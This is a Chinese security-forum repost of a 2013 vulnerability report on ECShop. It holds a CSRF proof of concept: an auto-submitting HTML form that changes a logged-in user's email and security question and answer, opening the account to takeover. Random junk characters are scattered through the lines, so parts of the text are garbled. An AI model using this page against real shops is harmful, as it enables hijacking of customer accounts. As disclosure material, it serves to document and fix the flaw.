找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1943|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
0 ]9 R4 x6 A! i# n! _ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现+ e6 a  p7 F6 d5 n. J
9 Z$ D2 @5 E# E9 z% n$ f
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
5 y$ }: j# A5 R6 _' @/ p& \
" C3 c. E' i1 E# n  H4 k详细说明:
$ g8 I' J6 S% ^; ^$ O% O利用csrf和xss可以突破官方所说的“障碍”( t2 ^: o7 R/ O6 O
xss版本已经有人说明
, B8 c: D+ G5 n8 A' B' G这里给出csrf版本
, |  `1 X6 `: M+ k9 z( w
. m3 M6 X( n1 L1 v1 D漏洞证明:
  C1 N% ]: o& ^: \3 e4 ]<html>6 {$ D" @5 R; Q
<body>
9 y# h6 V; i0 m/ J( q$ S+ |- _/ G<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
/ |+ t! [9 E3 |) P<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
2 }8 p2 Z3 i- @! K<INPUT TYPE="text" NAME="act" value="act_edit_profile">: ~  s7 W0 r+ k3 Z
<INPUT TYPE="text" NAME="sel_question" value="ecshop">4 D+ s, R* e6 ^( X5 e8 I9 W+ W& r
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
% Q% c5 ?1 _" Z% O</body>: V0 T0 e% `" Z2 q. D& k/ w+ M
<script>$ P# e# B% h5 P3 ]6 |
document.forms[0].submit();+ j; @  b; K* k, g
</script>
+ |: S& S7 t' y/ O</html>) t: D* a: H* z. w& u- |
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失5 M8 a1 Y# T; R: X1 M7 M
2 p: V8 L( d7 D/ u3 e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表